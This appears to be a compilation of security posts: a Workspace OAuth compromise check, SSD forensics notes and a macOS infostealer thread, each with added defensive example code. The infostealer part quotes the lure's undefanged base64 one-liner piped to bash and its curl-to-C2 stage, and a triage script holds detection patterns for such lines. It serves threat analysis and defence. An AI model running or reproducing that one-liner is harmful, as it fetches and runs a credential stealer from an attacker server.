To check if your Google Workspace has been compromised by the same tool that compromised Vercel:
1. Go to https://t.co/TpuIOW5Fwg
- This is Google Admin Console > Security > Access and Data Control > API Controls > Manage app access > Accessed Apps
2. Filter by ID = https://t.co/uqJnCqp5Ah
- This is the ID of the compromised OAuth app
If you see an app after filtering, you have potentially been compromised
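As an added example (not part of the post above), the same check can be run against an export of the Google Workspace OAuth token audit log rather than by hand in the Admin Console, which also shows who granted the app access, which scopes it got, and whether the grant was already revoked. The record shape (`items` with `actor`, `events` and `parameters`) is assumed from the Admin SDK Reports API `token` activity; the client ID and every event below are constructed placeholders, since the real ID sits behind a shortened link in the post.

```python
"""Added example: triage a Workspace OAuth token audit-log export for one suspect
OAuth client ID. Record layout is assumed from the Admin SDK Reports API
(applicationName=token); the client ID and events are constructed placeholders.
"""
import json
from collections import defaultdict

SUSPECT_CLIENT_ID = "PLACEHOLDER-CLIENT-ID.apps.googleusercontent.com"  # placeholder, not the real ID

# Constructed sample: trimmed shape of a reports().activities().list(userKey="all",
# applicationName="token") page. Names and times are invented.
SAMPLE_TOKEN_LOG = json.dumps({
    "items": [
        {"id": {"time": "2026-01-10T09:12:00.000Z", "applicationName": "token"},
         "actor": {"email": "alice@example.com"},
         "events": [{"type": "auth", "name": "authorize", "parameters": [
             {"name": "client_id", "value": SUSPECT_CLIENT_ID},
             {"name": "app_name", "value": "Suspicious Integration"},
             {"name": "scope", "multiValue": [
                 "https://www.googleapis.com/auth/gmail.readonly",
                 "https://www.googleapis.com/auth/drive"]}]}]},
        {"id": {"time": "2026-01-11T14:03:00.000Z", "applicationName": "token"},
         "actor": {"email": "bob@example.com"},
         "events": [{"type": "auth", "name": "authorize", "parameters": [
             {"name": "client_id", "value": SUSPECT_CLIENT_ID},
             {"name": "app_name", "value": "Suspicious Integration"},
             {"name": "scope", "multiValue": [
                 "https://www.googleapis.com/auth/drive"]}]}]},
        {"id": {"time": "2026-01-11T16:40:00.000Z", "applicationName": "token"},
         "actor": {"email": "carol@example.com"},
         "events": [{"type": "auth", "name": "authorize", "parameters": [
             {"name": "client_id", "value": "benign-app.apps.googleusercontent.com"},
             {"name": "app_name", "value": "Calendar Sync"},
             {"name": "scope", "multiValue": [
                 "https://www.googleapis.com/auth/calendar.readonly"]}]}]},
        {"id": {"time": "2026-01-12T08:30:00.000Z", "applicationName": "token"},
         "actor": {"email": "alice@example.com"},
         "events": [{"type": "auth", "name": "revoke", "parameters": [
             {"name": "client_id", "value": SUSPECT_CLIENT_ID},
             {"name": "app_name", "value": "Suspicious Integration"}]}]},
    ]
})


def _params(event):
    """Flatten an event's parameter list into a dict (multiValue kept as a list)."""
    return {p["name"]: p.get("multiValue", p.get("value")) for p in event.get("parameters", [])}


def find_grants(token_log_json, client_id):
    """Return {user_email: [events]} for every authorize/revoke of client_id.

    Each event carries time, name (authorize/revoke), app name and scopes, so a
    responder sees who granted access, what it could reach, and if it was revoked.
    """
    hits = defaultdict(list)
    for item in json.loads(token_log_json).get("items", []):
        actor = item.get("actor", {}).get("email", "<unknown>")
        for ev in item.get("events", []):
            params = _params(ev)
            if params.get("client_id") != client_id:
                continue
            hits[actor].append({
                "time": item["id"]["time"],
                "event": ev.get("name"),
                "app_name": params.get("app_name"),
                "scopes": params.get("scope", []),
            })
    return dict(hits)


def still_authorized(grants):
    """Users whose most recent event for the suspect client is an authorize, not a revoke."""
    exposed = [user for user, events in grants.items()
               if max(events, key=lambda e: e["time"])["event"] == "authorize"]
    return sorted(exposed)


if __name__ == "__main__":
    grants = find_grants(SAMPLE_TOKEN_LOG, SUSPECT_CLIENT_ID)
    for user, events in grants.items():
        for e in events:
            print(f"{e['time']} {user} {e['event']} {e['app_name']} scopes={e['scopes']}")
    print("still authorized:", still_authorized(grants))
```

Users returned by `still_authorized` are the ones whose tokens should be revoked first; the scope list tells you which data (mail, Drive) the token could have reached and therefore where to look in the corresponding audit logs.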
Local nerd @Thereallo1026 reverse engineered the new WhiteHouse app that the Trump administration was hyping up.
Nothing in it is innately malicious, however some design choices are odd. Also, it polls your GPS location every 240 seconds.
https://t.co/zGNgGKujgM
🚨 China has released an AI employee that runs 100% locally.
It can do research, code, build websites, create slide decks, and generate videos... all by itself. And it comes with its own computer.
100% Open Source.
the watchers: how openai, the US government, and persona have been secretly running an identity surveillance system since nov 2023.
https://t.co/Zz04WDF8Lz
researched by @vmfunc, @MDLcsgo, @DziurwaF
It will surprise you to know that a lot of Digital Forensics Investigators don’t really like the idea of investigating SSDs.
EVIDENCE CAN BE LOST AFTER A LAWFUL SEIZURE, AND SOLID-STATE DRIVES (SSDS) CAN ACT AS UNINTENTIONAL ANTI-FORENSIC DEVICES.
SSDs Break a Core Forensic Principle in Digital Forensics.
One of the foundational assumptions in digital forensics, developed during the era of magnetic hard disk drives (HDDs), is:
“Deleted data remains on storage media until it is overwritten.” This is a long-standing traditional principle.
Solid-State Drives can be viewed as unintentional anti-forensic devices because, unlike deliberate anti-forensic tools, they destroy potential evidence as part of their normal operation, without any malicious intent from the user.
The assumption that deleted data remains until overwritten no longer universally applies.
SSDs break this principle by design through:
1. TRIM
2. Garbage collection
3. Wear leveling
Because SSDs invalidate the “deleted data persists” principle, investigators must adapt by:
1. Prioritizing live analysis
2. Capturing volatile memory
3. Collecting system logs and cloud artifacts
4. Acting quickly before TRIM executes
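An added illustration of the three mechanisms named above, not part of the post: a toy flash translation layer in which an HDD-style drive keeps deleted data readable at its logical address, while an SSD model with TRIM drops the mapping (reads return zeros), garbage collection erases the invalidated page, and wear leveling leaves a stale copy in an unmapped physical page that only a raw chip-level read would see. Page sizes, block counts and read-zero-after-TRIM behaviour are simplified assumptions of this model, not any real firmware or forensic tool.

```python
"""Added example: toy FTL showing why "deleted data persists until overwritten"
holds for HDDs but not for SSDs with TRIM, garbage collection and wear leveling.
All behaviour is a simplified model for illustration (assumption), not real firmware.
"""

PAGE = 16  # bytes per page in the toy model


class ToyDrive:
    """Logical block addresses (LBAs) map onto physical pages.

    trim:       filesystem tells the drive which LBAs are free (SSD only).
    wear_level: rewrites go to a fresh physical page instead of in place.
    """

    def __init__(self, pages=8, trim=False, wear_level=False):
        self.phys = [b"\x00" * PAGE] * pages   # physical page contents
        self.lba_to_phys = {}                   # logical -> physical mapping
        self.invalid = set()                    # pages awaiting erase by GC
        self.free = list(range(pages))          # physical pages never written
        self.trim_enabled = trim
        self.wear_level = wear_level

    def write(self, lba, data):
        data = data.ljust(PAGE, b"\x00")[:PAGE]
        if self.wear_level or lba not in self.lba_to_phys:
            # Flash cannot overwrite in place: take a fresh page, retire the old one.
            if lba in self.lba_to_phys:
                self.invalid.add(self.lba_to_phys[lba])
            p = self.free.pop(0)
            self.lba_to_phys[lba] = p
        else:
            p = self.lba_to_phys[lba]           # HDD model: overwrite in place
        self.phys[p] = data

    def read(self, lba):
        """What the OS, and a logical-level imaging tool, sees at this LBA."""
        p = self.lba_to_phys.get(lba)
        return self.phys[p] if p is not None else b"\x00" * PAGE

    def delete(self, lba):
        """Filesystem unlink: only metadata changes unless a TRIM is sent."""
        if self.trim_enabled:
            # TRIM: the drive drops the mapping, so reads now return zeros.
            self.invalid.add(self.lba_to_phys.pop(lba))

    def garbage_collect(self):
        """Background GC erases invalidated pages, destroying their old content."""
        for p in self.invalid:
            self.phys[p] = b"\x00" * PAGE
            self.free.append(p)
        self.invalid.clear()

    def logical_image(self):
        """Sector-by-sector image as a write blocker plus dd would produce."""
        return b"".join(self.read(lba) for lba in range(len(self.phys)))

    def physical_dump(self):
        """Chip-off style raw read of every physical page, mapped or not."""
        return b"".join(self.phys)


def carve(image, marker=b"SECRET"):
    """Crude carving: does the marker survive anywhere in the image?"""
    return marker in image


def scenario(trim, wear_level, run_gc):
    """Write evidence, delete it, optionally let GC run; report what survives."""
    d = ToyDrive(trim=trim, wear_level=wear_level)
    d.write(3, b"SECRET evidence")
    d.delete(3)
    if run_gc:
        d.garbage_collect()
    return {"logical": carve(d.logical_image()), "physical": carve(d.physical_dump())}


def rewrite_scenario(wear_level):
    """Overwrite a file in place; does the old content survive in a raw dump?"""
    d = ToyDrive(wear_level=wear_level)
    d.write(3, b"SECRET evidence")
    d.write(3, b"public notes")
    return carve(d.physical_dump())


if __name__ == "__main__":
    print("HDD model, deleted:         ", scenario(False, False, False))
    print("SSD + TRIM, before GC:      ", scenario(True, True, False))
    print("SSD + TRIM, after GC:       ", scenario(True, True, True))
    print("HDD overwritten, raw dump:  ", rewrite_scenario(False))
    print("SSD overwritten, raw dump:  ", rewrite_scenario(True))
```

The gap between the "before GC" and "after GC" rows is the window the post's fourth point refers to: once the drive has been powered on long enough for garbage collection to run, even a chip-level read no longer helps. The rewrite rows show the flip side of wear leveling: an overwritten file's old copy can linger in an unmapped page where only a physical-level acquisition would find it.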
What separates Chinese cyber ops from Five Eyes?
Three things that shifted my thinking about this topic:
1. Early cyber training (90s-2000s) happened on live targets.
Not sandboxes, not simulations...actual foreign infrastructure. The "practice" was the operation. Operational errors caught during IR back then weren't failures of tradecraft... they were the cost of learning on production.
2. The private sector operates as APT infrastructure.
Cybersecurity companies founded by former 2000s hackers (Topsec, i-SOON, Integrity Tech) were later publicly linked to state-directed operations. The line between "legitimate vendor" and "APT contractor" is deliberately blurred (by design).
3. Operators don't stay siloed in their APT group.
They rotate across teams for decades, often carrying the exact same tools and tactics with them. What we label as "different APT groups" is often the same people with different hats.
This makes attribution way messier than the tidy narrative we see in threat reports.
Worth reading this epic report published by the Zurich Centre for Security Studies if this stuff keeps you up at night:
https://t.co/aGgMyPniWF
@jamieantisocial corp apps used in SOCs (re: excel, slack) will pick up both URI schemes and domains and attempt to hyperlink. the amount of alerts generated from misclicks... 💀
Honestly it doesn't matter much for defenders - code is code. We mostly talk about it to point out that threat actors STILL can't properly leverage AI and it's fun to roast them. This one goes out to everyone claiming "AI is a massive threat because TAs will use it for big bad things"
Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie )
Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2)
browndash1368[.]github[.]io >> macos[.]aidevmac[.]com
github[.]macos-developer[.]com/main
Then a bash script is shared:
echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash
Chaining more bash script from C2 (image 3)
/bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)"
Then downloading and executing a malicious Mach-O (image 4)
Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2"
IOCs
a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread)
ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)
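As an added triage helper (not part of the thread, and not any vendor's detection rule), the one-liner above can be decoded offline to recover the staged command and its indicators without executing anything. The sample lines are the thread's own one-liner plus two constructed contrast lines; the regexes and the defanging logic are mine.

```python
"""Added example: spot `echo '<base64>' | base64 -d | bash` and plain
`curl ... | sh` lines in a script, decode the payload offline, and report
defanged indicators. Nothing here is executed; it is a static triage helper.
"""
import base64
import binascii
import re

# Constructed sample: the one-liner from the thread (as posted, defanged) plus
# two contrast lines written for this example.
SAMPLE_LINES = [
    'echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" '
    "&& echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash",
    "echo 'hello' | base64 -d",                         # short, not piped to a shell: ignored
    "curl -fsSL https://example.com/install.sh | sh",   # pipe-to-shell without encoding
]

# echo '<base64>' | base64 -d | bash   (also accepts -D/--decode, sh, zsh, /bin/ prefix)
B64_TO_SHELL = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)"
    r"\s*\|\s*(?:/bin/)?(?:ba|z)?sh\b"
)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")
URL = re.compile(r"https?://[^\s\"'\)]+")


def defang(url):
    """http -> hxxp and dots in the host -> [.] so the IOC is safe to paste into a report."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def triage_line(line):
    """Classify one shell line; return a finding dict or None."""
    m = B64_TO_SHELL.search(line)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            decoded = "<undecodable>"
        return {
            "technique": "base64-encoded command piped to shell",
            "decoded": decoded,
            "iocs": [defang(u) for u in URL.findall(decoded)],
        }
    if PIPE_TO_SHELL.search(line) and "curl" in line:
        return {
            "technique": "remote script piped to shell",
            "decoded": None,
            "iocs": [defang(u) for u in URL.findall(line)],
        }
    return None


def triage(lines):
    """Run triage_line over a script and keep only the hits."""
    return [f for f in (triage_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding["technique"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
        print("  iocs:   ", finding["iocs"])
```

Decoding the thread's payload yields the second-stage command the author shows (a `curl` to the C2 piped into bash), which is how the listed IP was recovered; a real triage pass would feed the defanged URLs into blocklists and hunt for the same `base64 -d | bash` pattern in endpoint shell history.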